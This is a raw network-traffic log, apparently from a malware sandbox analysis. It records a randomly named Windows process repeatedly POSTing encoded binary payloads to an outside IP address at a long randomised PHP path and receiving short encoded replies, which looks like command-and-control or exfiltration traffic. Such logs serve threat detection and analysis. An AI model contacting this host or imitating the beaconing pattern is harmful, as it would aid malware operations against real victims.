                                                                                                                      Dec 8, 2024 15:27:45.810146093 CET2584OUTData Raw: 55 5f 46 51 5e 45 50 52 54 5e 50 59 5b 5f 59 5a 59 54 59 5c 57 5d 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_FQ^EPRT^PY[_YZYTY\W]QWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[0=6&63-%";&Z;8 3=<%#*]1: <, ]!![
                                                                                                                      Dec 8, 2024 15:27:46.871999979 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:47.104183912 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:46 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.449762185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:47.348248005 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:47.700836897 CET2584OUTData Raw: 55 58 43 56 5b 40 50 56 54 5e 50 59 5b 5c 59 5e 59 58 59 58 57 56 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXCV[@PVT^PY[\Y^YXYXWVQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.X3=1[29=!U).*^#"[88;'=,&V)2+!",+^;; ]!![ 0
                                                                                                                      Dec 8, 2024 15:27:48.672621965 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:48.912297010 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:48 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.449763185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:49.144603014 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:49.497684956 CET2584OUTData Raw: 50 59 46 53 5b 44 55 55 54 5e 50 59 5b 51 59 58 59 54 59 5d 57 50 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYFS[DUUT^PY[QYXYTY]WPQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-0>1*5#3&.$5"86;8' _%0"1"Y <4;; ]!![


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.449764185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:50.227385044 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:50.576031923 CET1904OUTData Raw: 50 5f 46 54 5b 46 55 5f 54 5e 50 59 5b 5c 59 53 59 5f 59 5e 57 50 51 5b 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P_FT[FU_T^PY[\YSY_Y^WPQ[YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.X0=1[&:&509\.$&_#8*;(U'% ^%! <8 ]!![ 0
                                                                                                                      Dec 8, 2024 15:27:51.552993059 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:51.788412094 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:51 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 55 26 1c 30 0f 3d 04 08 58 31 02 0d 5e 30 38 3b 17 29 30 0a 04 33 39 0d 05 2c 04 01 56 37 05 30 58 30 04 27 02 36 3f 27 53 2e 12 20 5a 06 10 21 14 24 2c 2b 10 3c 02 22 06 25 16 39 0a 35 37 1a 1c 27 3e 3f 53 29 14 26 5d 21 3c 27 54 32 03 0f 1c 2e 35 0b 01 31 0e 0a 0d 25 0c 2c 55 0f 1f 25 09 30 0c 05 53 20 37 25 0e 20 20 09 5b 25 0b 31 08 23 3c 24 50 3f 3d 24 11 3c 1c 3b 04 23 0b 3f 58 3a 3b 39 58 2a 31 38 0d 25 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 9U&0=X1^08;)039,V70X0'6?'S. Z!$,+<"%957'>?S)&]!<'T2.51%,U%0S 7% [%1#<$P?=$<;#?X:;9X*18%< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.449765185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:50.348189116 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:50.700922012 CET2584OUTData Raw: 55 5b 43 5c 5e 40 55 50 54 5e 50 59 5b 5f 59 5a 59 5e 59 5b 57 52 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U[C\^@UPT^PY[_YZY^Y[WRQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.^3[>2!"6.6^";583$[%022 </+ ]!![
                                                                                                                      Dec 8, 2024 15:27:51.685236931 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:51.920366049 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:51 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.449766185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:52.160321951 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:52.513241053 CET2584OUTData Raw: 55 5e 43 5c 5b 48 55 5f 54 5e 50 59 5b 5c 59 52 59 58 59 59 57 5d 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U^C\[HU_T^PY[\YRYXYYW]Q_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'%*9!!,')4=/$T$%Y18"7/<.+ ]!![ 0
                                                                                                                      Dec 8, 2024 15:27:53.484991074 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:53.720293045 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:53 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.449767185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:53.996576071 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:54.384280920 CET2580OUTData Raw: 50 5f 46 56 5b 49 55 51 54 5e 50 59 5b 58 59 5c 59 5c 59 57 57 54 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P_FV[IUQT^PY[XY\Y\YWWTQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$=Z1*5]6#,$6Y#9,(+'&0.%#8 ]!![
                                                                                                                      Dec 8, 2024 15:27:55.315921068 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:55.548507929 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:55 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.2.449770185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:55.786500931 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:56.138292074 CET2584OUTData Raw: 50 58 43 55 5b 49 55 52 54 5e 50 59 5b 50 59 58 59 55 59 5c 57 51 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PXCU[IURT^PY[PYXYUY\WQQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'.1%9!Y!>.*X ._;;#0>X2>'(97<'[8 ]!![
                                                                                                                      Dec 8, 2024 15:27:57.123464108 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:57.356297970 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:56 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.2.449771185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:57.359291077 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:57.716389894 CET1904OUTData Raw: 55 59 46 56 5e 47 50 54 54 5e 50 59 5b 5a 59 5b 59 55 59 5c 57 52 51 5b 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFV^GPTT^PY[ZY[YUY\WRQ[YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'[1)694:^ 898;,R$X$&1&:#Z8,; ]!![ (
                                                                                                                      Dec 8, 2024 15:27:58.689357996 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:58.924663067 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:58 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 1d 32 35 05 1d 2a 2a 21 03 31 12 2c 07 27 16 01 15 29 1e 38 06 27 3a 38 5a 2c 39 28 0d 20 02 20 1b 30 04 3b 03 36 12 06 0e 2c 38 20 5a 06 10 21 5d 25 3c 23 12 3f 2b 0b 5a 24 38 2d 42 21 27 20 19 27 2d 34 0a 29 3a 29 07 23 3f 2f 55 26 03 08 0e 2e 1c 36 5f 27 23 33 13 25 36 2c 55 0f 1f 26 50 27 1c 0d 55 22 27 39 0f 22 09 20 02 32 43 2e 56 35 11 3f 0e 3c 04 37 03 3f 32 27 04 23 31 3f 10 3a 3b 00 00 3d 0c 20 08 30 2c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 925**!1,')8':8Z,9( 0;6,8 Z!]%<#?+Z$8-B!' '-4):)#?/U&.6_'#3%6,U&P'U"'9" 2C.V5?<7?2'#1?:;= 0, S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.2.449772185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:57.522468090 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:57.872934103 CET2584OUTData Raw: 50 59 43 50 5b 43 55 5e 54 5e 50 59 5b 5b 59 5d 59 59 59 59 57 5c 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYCP[CU^T^PY[[Y]YYYYW\Q]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z$=^&)5Z6369:\"+98<R'(%05& /(/+ ]!![ ,
                                                                                                                      Dec 8, 2024 15:27:58.853537083 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:59.088303089 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:58 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.449778185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:59.332180977 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:59.685121059 CET2580OUTData Raw: 50 59 46 57 5b 49 50 53 54 5e 50 59 5b 58 59 5e 59 5d 59 5c 57 57 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYFW[IPST^PY[XY^Y]Y\WWQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'_%9653%Y97)78%;0>8[25&;.\#/']/; ]!![ 4
                                                                                                                      Dec 8, 2024 15:28:00.660453081 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:00.896447897 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:00 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.449784185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:01.130518913 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
